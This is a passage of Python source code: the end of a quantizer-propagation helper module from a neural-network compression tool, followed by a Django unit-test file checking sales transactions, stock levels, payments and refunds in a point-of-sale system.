if pq.id == requested_pqid:
return gid
return None
def merge_groups(self, merge_to_gid: int, merge_from_gid: int):
"""
Merges two groups into a single one. The `merge_to_gid` group retains its group ID.
:param merge_to_gid: The ID of the group to merge into.
:param merge_from_gid: The ID of the group to merge into the group defined by `merge_to_gid`
"""
if merge_to_gid == merge_from_gid:
return
self._group_vs_prop_quants_dict[merge_to_gid].update(self._group_vs_prop_quants_dict[merge_from_gid])
self._group_vs_prop_quants_dict.pop(merge_from_gid)
class QuantizersWaitingForMergeManager:
"""
Tracks the quantizers that await a merge while trying to transition through a downward-branching node
and corresponding node keys.
"""
def __init__(self):
self._branching_node_keys_vs_quantizers_waiting_for_merge = {} # type: Dict[str, Set[PropagatingQuantizer]]
self._quantizers_vs_branching_node_keys = {} # type: Dict[PropagatingQuantizer, str]
def add_propagating_quantizer_to_wait_on_node_key(self, pq: PropagatingQuantizer, branching_node_key: str):
"""
Registers a propagating quantizer as "waiting" on a node in QuantizerPropagationStateGraph.
:param pq: The propagating quantizer to be registered as "waiting".
:param branching_node_key: The node key in QuantizerPropagationStateGraph to be waited upon, most likely
the downward-branching node.
"""
if branching_node_key not in self._branching_node_keys_vs_quantizers_waiting_for_merge:
self._branching_node_keys_vs_quantizers_waiting_for_merge[branching_node_key] = set()
self._branching_node_keys_vs_quantizers_waiting_for_merge[branching_node_key].add(pq)
self._quantizers_vs_branching_node_keys[pq] = branching_node_key
def get_blocking_node(self, pq: PropagatingQuantizer) -> str:
"""
Returns the node key upon which the propagating quantizer is registered to be "waiting".
:param pq: The propagating quantizer that has already been registered to be "waiting" on a node.
:return: The node key in QuantizerPropagationStateGraph that the `pq` is registered to be waiting upon.
"""
return self._quantizers_vs_branching_node_keys[pq]
def get_waiting_quantizers_for_branching_node_key(self, node_key: str) -> Set[PropagatingQuantizer]:
"""
Returns the set of all quantizers registered to be "waiting" on a given node key in
QuantizerPropagationStateGraph.
:param node_key: The node key in QuantizerPropagationStateGraph
:return: The set of propagating quantizers registered as "waiting" on `node_key`.
"""
return self._branching_node_keys_vs_quantizers_waiting_for_merge[node_key]
def __contains__(self, item: PropagatingQuantizer):
return item in self._quantizers_vs_branching_node_keys.keys()
def resolve_merged_node(self, branching_node_key: str):
"""
De-registers any quantizers that were previously registered to be "waiting" on a given node key.
:param branching_node_key: The node key in QuantizerPropagationStateGraph that some propagating
quantizers have previously been registered upon.
"""
for pq in self._branching_node_keys_vs_quantizers_waiting_for_merge[branching_node_key]:
self._quantizers_vs_branching_node_keys.pop(pq)
self._branching_node_keys_vs_quantizers_waiting_for_merge.pop(branching_node_key)
|
from decimal import Decimal
from django.test import TestCase
from swipe.settings import USED_CURRENCY
from article.models import ArticleType, OtherCostType
from article.tests import INeedSettings
from crm.models import User, Person
from logistics.models import SupplierOrder, StockWish
from money.models import Currency, Cost, Money, VAT, Price, AccountingGroup, CurrencyData
from order.models import Order, OrderLine
from register.models import PaymentType, Register, RegisterMaster, RegisterCount
from sales import models
from sales.models import SalesTransactionLine, Payment, Transaction, NotEnoughStockError, \
OtherCostTransactionLine, OtherTransactionLine, TransactionLine, PaymentMisMatchError, NotEnoughOrderLinesError, \
PaymentTypeError, RefundTransactionLine, RefundError, InvalidDataException, StockCollections, PriceOverride
from stock.models import Stock, StockChangeSet
from stock.stocklabel import OrderLabel
from supplication.models import PackingDocument
from supplier.models import Supplier, ArticleTypeSupplier
from tools.testing import TestData
# noinspection PyUnusedLocal,PyUnusedLocal,PyUnusedLocal,PyUnusedLocal,PyUnusedLocal
class TestTransactionCreationFunction(TestCase, TestData):
def setUp(self):
self.setup_base_data()
self.vat_group = self.vat_group_high
self.price = Price(amount=Decimal("1.00"), use_system_currency=True)
self.currency = Currency(iso=USED_CURRENCY)
self.acc_group = self.accounting_group_components
self.article_type = self.articletype_1
self.at2 = self.articletype_2
self.at3 = ArticleType(accounting_group=self.acc_group, name="Foo3")
self.at3.save()
cost = Cost(amount=Decimal(1), use_system_currency=True)
self.supplier = self.supplier_1
ats = self.articletypesupplier_article_1
ats2 = self.articletypesupplier_article_2
self.money = Money(amount=Decimal(3.32), currency=self.currency)
self.customer = self.customer_person_1
self.copro = self.user_1
self.pt = PaymentType.objects.create(name="Bla")
self.pt2 = PaymentType.objects.create(name="Baz")
self.pt3 = PaymentType.objects.create(name="Quux")
self.cost = Cost(currency=Currency(USED_CURRENCY), amount=Decimal(1.23))
self.cost2 = Cost(currency=Currency(USED_CURRENCY), amount=Decimal(1.24))
self.simplest = SalesTransactionLine(article=self.article_type, count=1, cost=self.cost,
price=self.price, num=1)
self.simple_payment_usd = Payment(amount=self.money, payment_type=self.pt)
self.simple_payment_eur = Payment(amount=Money(amount=Decimal(2.0), currency=Currency(USED_CURRENCY)),
payment_type=self.pt)
self.other_cost = OtherCostType(name="Oth1", accounting_group=self.acc_group,
fixed_price=self.price
)
self.other_cost.save()
self.currency_data_eur = CurrencyData(iso="EUR", name="Euro", symbol="€", digits=2)
self.currency_data_eur.save()
self.register = Register(currency=self.currency_data_eur, name="Foo", is_cash_register=False, is_active=True,
payment_type=self.pt)
self.register.save()
self.register2 = Register(currency=self.currency_data_eur, name="Bar", is_cash_register=False, is_active=True,
payment_type=self.pt2)
self.register2.save()
self.register.open(counted_amount=Decimal(0))
self.register2.open(counted_amount=Decimal(0))
def test_not_enough_stock_error(self):
oalist = [SalesTransactionLine(price=self.price, count=1, order=None, article=self.article_type)]
with self.assertRaises(NotEnoughStockError):
Transaction.create_transaction(user=self.copro, payments=[self.simple_payment_usd],
transaction_lines=oalist)
def test_not_enough_parameters(self):
s1 = SalesTransactionLine(count=2, price=self.price)
s2 = SalesTransactionLine(count=2, article=self.article_type)
s3 = OtherCostTransactionLine(count=1, price=self.price)
s4 = OtherCostTransactionLine(count=2, other_cost_type=self.other_cost)
s5 = OtherTransactionLine(count=2, price=self.price)
s6 = OtherTransactionLine(count=1, text="Bla")
s7 = OtherTransactionLine(count=3, text="Bla", price=self.price)
with self.assertRaises(models.InvalidDataException):
Transaction.create_transaction(user=self.copro, payments=[self.simple_payment_usd],
transaction_lines=[s1])
with self.assertRaises(models.IncorrectDataException):
Transaction.create_transaction(user=self.copro, payments=[self.simple_payment_usd],
transaction_lines=[s2])
with self.assertRaises(models.InvalidDataException):
Transaction.create_transaction(user=self.copro, payments=[self.simple_payment_usd],
transaction_lines=[s3])
with self.assertRaises(models.IncorrectDataException):
Transaction.create_transaction(user=self.copro, payments=[self.simple_payment_usd],
transaction_lines=[s4])
with self.assertRaises(models.IncorrectDataException):
Transaction.create_transaction(user=self.copro, payments=[self.simple_payment_usd],
transaction_lines=[s5])
with self.assertRaises(models.IncorrectDataException):
Transaction.create_transaction(user=self.copro, payments=[self.simple_payment_usd],
transaction_lines=[s6])
with self.assertRaises(models.InvalidDataException):
Transaction.create_transaction(user=self.copro, payments=[self.simple_payment_usd],
transaction_lines=[s7])
def test_sales_transaction_line_wrong_customer_stock(self):
AMOUNT_1 = 6
AMOUNT_2 = 10
Order.create_order_from_wishables_combinations(self.copro, self.customer,
[[self.article_type, AMOUNT_1, self.price],
[self.at2, AMOUNT_2, self.price]])
SupplierOrder.create_supplier_order(self.copro, self.supplier,
articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
[self.at2, AMOUNT_2, self.cost]])
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_1],
[self.at2, AMOUNT_2]],
packing_document_name="Foo")
stl = SalesTransactionLine(price=Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True,
vat=1.23),
count=2, article=self.article_type)
with self.assertRaises(NotEnoughStockError):
Transaction.create_transaction(user=self.copro, payments=[self.simple_payment_eur], transaction_lines=[stl])
def test_sales_transaction_line(self):
AMOUNT_1 = 6
AMOUNT_2 = 10
order = Order.create_order_from_wishables_combinations(self.copro, self.customer,
[[self.article_type, AMOUNT_1, self.price],
[self.at2, AMOUNT_2, self.price]])
SupplierOrder.create_supplier_order(self.copro, self.supplier,
articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
[self.at2, AMOUNT_2, self.cost]])
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_1],
[self.at2, AMOUNT_2]],
packing_document_name="Foo")
count = 2
stl = SalesTransactionLine(price=Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True,
vat=1.23),
count=count, article=self.article_type, order=order.id)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[stl])
tls = TransactionLine.objects.all()
self.assertEquals(len(tls), 1)
obj = tls[0]
self.assertEquals(obj.num, self.article_type.id)
self.assertEquals(obj.count, 2)
self.assertFalse(obj.isRefunded)
self.assertEquals(obj.order, order.id)
self.assertEquals(obj.text, str(self.article_type))
st = Stock.objects.get(labeltype="Order", labelkey=order.id, article=self.article_type)
self.assertEquals(st.count, AMOUNT_1 - count)
ols_1 = OrderLine.objects.filter(wishable__sellabletype=self.article_type, state='S')
ols_2 = OrderLine.objects.filter(wishable__sellabletype=self.article_type, state='A')
ols = OrderLine.objects.filter(wishable__sellabletype=self.article_type)
self.assertEquals(len(ols_1), count)
self.assertEquals(len(ols_2), AMOUNT_1 - count)
def test_sales_stock_level(self):
AMOUNT_STOCK_1 = 5
StockWish.create_stock_wish(user_modified=self.copro, articles_ordered=[(self.article_type, AMOUNT_STOCK_1)])
SupplierOrder.create_supplier_order(supplier=self.supplier,
articles_ordered=[[self.article_type, AMOUNT_STOCK_1, self.cost]],
user_modified=self.copro)
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_STOCK_1]],
packing_document_name="Foo")
count = 3
stl = SalesTransactionLine(
price=Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23),
count=count, article=self.article_type, order=None)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[stl])
st = Stock.objects.get(labeltype__isnull=True, article=self.article_type)
self.assertEquals(st.count, AMOUNT_STOCK_1 - count)
def test_sales_all_stock_levels(self):
AMOUNT_STOCK_1 = 5
AMOUNT_ORDER = 4
order= Order.create_order_from_wishables_combinations(user=self.copro, customer=self.customer,
wishable_type_number_price_combinations=[[self.article_type,
AMOUNT_ORDER,
self.price]])
StockWish.create_stock_wish(user_modified=self.copro, articles_ordered=[(self.article_type, AMOUNT_STOCK_1)])
SupplierOrder.create_supplier_order(supplier=self.supplier,
articles_ordered=[[self.article_type, AMOUNT_STOCK_1 + AMOUNT_ORDER,
self.cost]],
user_modified=self.copro)
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type,
AMOUNT_STOCK_1 + AMOUNT_ORDER]],
packing_document_name="Foo")
count_stock = 3
count_order = 2
stl = SalesTransactionLine(
price=Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23),
count=count_stock, article=self.article_type, order=None)
stl2 = SalesTransactionLine(
price=Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23),
count=count_order, article=self.article_type, order=order.id)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * (count_stock + count_order),
currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[stl, stl2])
st = Stock.objects.get(labeltype__isnull=True, article=self.article_type)
self.assertEquals(st.count, AMOUNT_STOCK_1 - count_stock)
st2 = Stock.objects.get(labeltype="Order", labelkey=order.id, article=self.article_type)
self.assertEquals(st2.count, AMOUNT_ORDER - count_order)
def test_sales_transaction_not_enough_stock(self):
AMOUNT_1 = 6
AMOUNT_2 = 10
order = Order.create_order_from_wishables_combinations(self.copro, self.customer,
[[self.article_type, AMOUNT_1, self.price],
[self.at2, AMOUNT_2, self.price]])
SupplierOrder.create_supplier_order(self.copro, self.supplier,
articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
[self.at2, AMOUNT_2, self.cost]])
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_1],
[self.at2, AMOUNT_2]],
packing_document_name="Foo")
count = AMOUNT_1 + 1
stl = SalesTransactionLine(price=Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True,
vat=1.23),
count=count, article=self.article_type, order=order.id)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
with self.assertRaises(NotEnoughStockError):
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[stl])
def test_sales_transaction_just_enough_stock(self):
AMOUNT_1 = 6
AMOUNT_2 = 10
order = Order.create_order_from_wishables_combinations(self.copro, self.customer,
[[self.article_type, AMOUNT_1, self.price],
[self.at2, AMOUNT_2, self.price]])
SupplierOrder.create_supplier_order(self.copro, self.supplier,
articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
[self.at2, AMOUNT_2, self.cost]])
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_1],
[self.at2, AMOUNT_2]],
packing_document_name="Foo")
count = AMOUNT_1
stl = SalesTransactionLine(price=Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True,
vat=1.23),
count=count, article=self.article_type, order=order.id)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[stl])
def test_sales_transaction_too_much_payment(self):
AMOUNT_1 = 6
AMOUNT_2 = 10
order = Order.create_order_from_wishables_combinations(self.copro, self.customer,
[[self.article_type, AMOUNT_1, self.price],
[self.at2, AMOUNT_2, self.price]])
SupplierOrder.create_supplier_order(self.copro, self.supplier,
articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
[self.at2, AMOUNT_2, self.cost]])
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_1],
[self.at2, AMOUNT_2]],
packing_document_name="Foo")
count = AMOUNT_1
stl = SalesTransactionLine(price=Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True,
vat=1.23),
count=count, article=self.article_type, order=order.id)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count + Decimal(0.001),
currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
with self.assertRaises(PaymentMisMatchError):
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[stl])
def test_sales_transaction_too_little_payment(self):
AMOUNT_1 = 6
AMOUNT_2 = 10
order = Order.create_order_from_wishables_combinations(self.copro, self.customer,
[[self.article_type, AMOUNT_1, self.price],
[self.at2, AMOUNT_2, self.price]])
SupplierOrder.create_supplier_order(self.copro, self.supplier,
articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
[self.at2, AMOUNT_2, self.cost]])
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_1],
[self.at2, AMOUNT_2]],
packing_document_name="Foo")
count = AMOUNT_1
stl = SalesTransactionLine(price=Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True,
vat=1.23),
count=count, article=self.article_type, order=order.id)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count - Decimal(0.001),
currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
with self.assertRaises(PaymentMisMatchError):
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[stl])
def test_sales_transaction_other_cost(self):
AMOUNT_1 = 6
AMOUNT_2 = 10
AMOUNT_3 = 5
order = Order.create_order_from_wishables_combinations(self.copro, self.customer,
[[self.article_type, AMOUNT_1, self.price],
[self.at2, AMOUNT_2, self.price], [self.other_cost, AMOUNT_3,
self.price]])
SupplierOrder.create_supplier_order(self.copro, self.supplier,
articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
[self.at2, AMOUNT_2, self.cost]])
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_1],
[self.at2, AMOUNT_2]],
packing_document_name="Foo")
count = AMOUNT_3 - 1
octt = OtherCostTransactionLine(price=Price(amount=self.simple_payment_eur.amount.amount,
use_system_currency=True, vat=1.23),
count=count, other_cost_type=self.other_cost, order=order.id)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[octt])
tls = TransactionLine.objects.all()
self.assertEquals(len(tls), 1)
octls = OtherCostTransactionLine.objects.all()
self.assertEquals(len(octls), 1)
octl = octls[0]
self.assertFalse(octl.isRefunded)
self.assertEquals(octl.count, count)
self.assertEquals(octl.order, order.id)
self.assertEquals(octl.text, octl.other_cost_type.name)
sold_counter = 0
ols = OrderLine.objects.filter(wishable__sellabletype=self.other_cost, order_id=order.id)
for ol in ols:
if ol.state == 'S':
sold_counter += 1
self.assertEquals(sold_counter, count)
def test_sales_transaction_other_cost_just_enough_orderlines(self):
AMOUNT_1 = 6
AMOUNT_2 = 10
AMOUNT_3 = 5
order = Order.create_order_from_wishables_combinations(self.copro, self.customer,
[[self.article_type, AMOUNT_1, self.price],
[self.at2, AMOUNT_2, self.price], [self.other_cost, AMOUNT_3,
self.price]])
SupplierOrder.create_supplier_order(self.copro, self.supplier,
articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
[self.at2, AMOUNT_2, self.cost]])
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_1],
[self.at2, AMOUNT_2]],
packing_document_name="Foo")
count = AMOUNT_3
octt = OtherCostTransactionLine(price=Price(amount=self.simple_payment_eur.amount.amount,
use_system_currency=True, vat=1.23),
count=count, other_cost_type=self.other_cost, order=order.id)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[octt])
tls = TransactionLine.objects.all()
self.assertEquals(len(tls), 1)
octls = OtherCostTransactionLine.objects.all()
self.assertEquals(len(octls), 1)
octl = octls[0]
self.assertFalse(octl.isRefunded)
self.assertEquals(octl.count, count)
self.assertEquals(octl.order, order.id)
self.assertEquals(octl.text, octl.other_cost_type.name)
sold_counter = 0
ols = OrderLine.objects.filter(wishable__sellabletype=self.other_cost, order_id=order.id)
for ol in ols:
if ol.state == 'S':
sold_counter += 1
self.assertEquals(sold_counter, count)
def test_sales_transaction_other_cost_not_enough_orderlines(self):
AMOUNT_1 = 6
AMOUNT_2 = 10
AMOUNT_3 = 5
order = Order.create_order_from_wishables_combinations(self.copro, self.customer,
[[self.article_type, AMOUNT_1, self.price],
[self.at2, AMOUNT_2, self.price], [self.other_cost, AMOUNT_3,
self.price]])
SupplierOrder.create_supplier_order(self.copro, self.supplier,
articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
[self.at2, AMOUNT_2, self.cost]])
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_1],
[self.at2, AMOUNT_2]],
packing_document_name="Foo")
count = AMOUNT_3 + 1
octt = OtherCostTransactionLine(price=Price(amount=self.simple_payment_eur.amount.amount,
use_system_currency=True, vat=1.23),
count=count, other_cost_type=self.other_cost, order=order.id)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
with self.assertRaises(NotEnoughOrderLinesError):
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[octt])
def test_sales_transaction_other_line(self):
AMOUNT_1 = 6
AMOUNT_2 = 10
AMOUNT_3 = 5
Order.create_order_from_wishables_combinations(self.copro, self.customer,
[[self.article_type, AMOUNT_1, self.price],
[self.at2, AMOUNT_2, self.price], [self.other_cost, AMOUNT_3,
self.price]])
SupplierOrder.create_supplier_order(self.copro, self.supplier,
articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
[self.at2, AMOUNT_2, self.cost]])
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_1],
[self.at2, AMOUNT_2]],
packing_document_name="Foo")
count = 10
p = Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23)
otl = OtherTransactionLine(count=count, price=p, text="Meh", accounting_group=self.acc_group)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[otl])
tl = TransactionLine.objects.get()
otl = OtherTransactionLine.objects.get()
self.assertEquals(otl.count, count)
self.assertFalse(otl.isRefunded)
self.assertEquals(otl.text, "Meh")
self.assertEquals(otl.num, -1)
def test_sales_transaction_wrong_currency(self):
AMOUNT_1 = 6
AMOUNT_2 = 10
AMOUNT_3 = 5
Order.create_order_from_wishables_combinations(self.copro, self.customer,
[[self.article_type, AMOUNT_1, self.price],
[self.at2, AMOUNT_2, self.price], [self.other_cost, AMOUNT_3,
self.price]])
SupplierOrder.create_supplier_order(self.copro, self.supplier,
articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
[self.at2, AMOUNT_2, self.cost]])
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_1],
[self.at2, AMOUNT_2]],
packing_document_name="Foo")
count = 10
p = Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23)
otl = OtherTransactionLine(count=count, price=p, text="Meh", accounting_group=self.acc_group)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency("USD"))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
with self.assertRaises(InvalidDataException):
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[otl])
def test_sales_transaction_two_payments(self):
AMOUNT_1 = 6
AMOUNT_2 = 10
AMOUNT_3 = 5
Order.create_order_from_wishables_combinations(self.copro, self.customer,
[[self.article_type, AMOUNT_1, self.price],
[self.at2, AMOUNT_2, self.price], [self.other_cost, AMOUNT_3,
self.price]])
SupplierOrder.create_supplier_order(self.copro, self.supplier,
articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
[self.at2, AMOUNT_2, self.cost]])
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_1],
[self.at2, AMOUNT_2]],
packing_document_name="Foo")
count = 10
p = Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23)
otl = OtherTransactionLine(count=count, price=p, text="Meh", accounting_group=self.acc_group)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count - Decimal(1),
currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
local_payment2 = Payment(amount=Money(amount=Decimal(1), currency=Currency(USED_CURRENCY)),
payment_type=self.pt2)
Transaction.create_transaction(user=self.copro, payments=[local_payment, local_payment2],
transaction_lines=[otl])
def test_sales_transaction_mixed_transaction_lines(self):
AMOUNT_1 = 6
AMOUNT_2 = 10
AMOUNT_3 = 5
order = Order.create_order_from_wishables_combinations(self.copro, self.customer,
[[self.article_type, AMOUNT_1, self.price],
[self.at2, AMOUNT_2, self.price], [self.other_cost, AMOUNT_3,
self.price]])
SupplierOrder.create_supplier_order(self.copro, self.supplier,
articles_ordered=[[self.article_type, AMOUNT_1, self.cost],
[self.at2, AMOUNT_2, self.cost]])
PackingDocument.create_packing_document(user=self.copro, supplier=self.supplier,
article_type_cost_combinations=[[self.article_type, AMOUNT_1],
[self.at2, AMOUNT_2]],
packing_document_name="Foo")
count_1 = AMOUNT_1 - 4
count_2 = AMOUNT_2 - 2
count_3 = AMOUNT_3 - 2
count_4 = 10
total_count = count_1 + count_2 + count_3 + count_4
p = Price(amount=Decimal(1), use_system_currency=True, vat=1.23)
stl_1 = SalesTransactionLine(count=count_1, price=p, article=self.article_type, order=order.id)
stl_2 = SalesTransactionLine(count=count_2, price=p, article=self.at2, order=order.id)
octl = OtherCostTransactionLine(count=count_3, price=p, other_cost_type=self.other_cost)
otl = OtherTransactionLine(count=count_4, price=p, text="Rand", accounting_group=self.acc_group)
loc_money = Money(amount=Decimal(1) * total_count - Decimal(1), currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
local_payment2 = Payment(amount=Money(amount=Decimal(1), currency=Currency(USED_CURRENCY)),
payment_type=self.pt2)
Transaction.create_transaction(user=self.copro, payments=[local_payment, local_payment2],
transaction_lines=[stl_1, stl_2, octl, otl])
tls = TransactionLine.objects.all()
self.assertEquals(len(tls), 4)
stls = SalesTransactionLine.objects.all()
self.assertEquals(len(stls), 2)
OtherCostTransactionLine.objects.get()
OtherTransactionLine.objects.get()
pmnts = Payment.objects.all()
self.assertEquals(len(pmnts), 2)
Transaction.objects.get()
def test_transaction_payment_not_in_opened_register(self):
count = 2
p = Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23)
otl = OtherTransactionLine(count=count, price=p, text="Meh", accounting_group=self.acc_group)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt3)
with self.assertRaises(PaymentTypeError):
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[otl])
def test_refund_line(self):
count = 5
p = Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23)
otl = OtherTransactionLine(count=count, price=p, text="Meh", accounting_group=self.acc_group)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[otl])
count_refund = -2
trl = TransactionLine.objects.get()
rfl = RefundTransactionLine(count=count_refund, price=p, sold_transaction_line=trl)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count_refund, currency=Currency(USED_CURRENCY))
nega_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[nega_payment], transaction_lines=[rfl])
trls = TransactionLine.objects.all()
self.assertEquals(len(trls), 2)
self.assertIsNone(trls[1].order)
self.assertEquals(trls[1].num, -1)
self.assertEquals(trls[1].count, count_refund)
self.assertEquals(trls[1].text, trls[0].text)
def test_refund_line_too_many_refunded(self):
count = 5
p = Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23)
otl = OtherTransactionLine(count=count, price=p, text="Meh", accounting_group=self.acc_group)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[otl])
count_refund = -6
trl = TransactionLine.objects.get()
rfl = RefundTransactionLine(count=count_refund, price=p, sold_transaction_line=trl)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count_refund, currency=Currency(USED_CURRENCY))
nega_payment = Payment(amount=loc_money, payment_type=self.pt)
with self.assertRaises(RefundError):
Transaction.create_transaction(user=self.copro, payments=[nega_payment], transaction_lines=[rfl])
def test_refund_line_just_enough_refunded(self):
count = 5
p = Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23)
otl = OtherTransactionLine(count=count, price=p, text="Meh", accounting_group=self.acc_group)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[otl])
count_refund = -5
trl = TransactionLine.objects.get()
rfl = RefundTransactionLine(count=count_refund, price=p, sold_transaction_line=trl)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count_refund, currency=Currency(USED_CURRENCY))
nega_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[nega_payment], transaction_lines=[rfl])
def test_refund_line_too_many_refunded_two_new_refunds(self):
count = 5
p = Price(amount=self.simple_payment_eur.amount.amount, use_system_currency=True, vat=1.23)
otl = OtherTransactionLine(count=count, price=p, text="Meh", accounting_group=self.acc_group)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count, currency=Currency(USED_CURRENCY))
local_payment = Payment(amount=loc_money, payment_type=self.pt)
Transaction.create_transaction(user=self.copro, payments=[local_payment], transaction_lines=[otl])
count_refund_1 = -3
count_refund_2 = -3
count_refund_total = count_refund_1 + count_refund_2
trl = TransactionLine.objects.get()
rfl = RefundTransactionLine(count=count_refund_1, price=p, sold_transaction_line=trl)
rfl2 = RefundTransactionLine(count=count_refund_2, price=p, sold_transaction_line=trl)
loc_money = Money(amount=self.simple_payment_eur.amount.amount * count_refund_total,
currency=Currency(USED_CURRENCY))
nega_payment = Payment(amount=loc_money, payment_type=self.pt)
with self.assertRaises(RefundError):
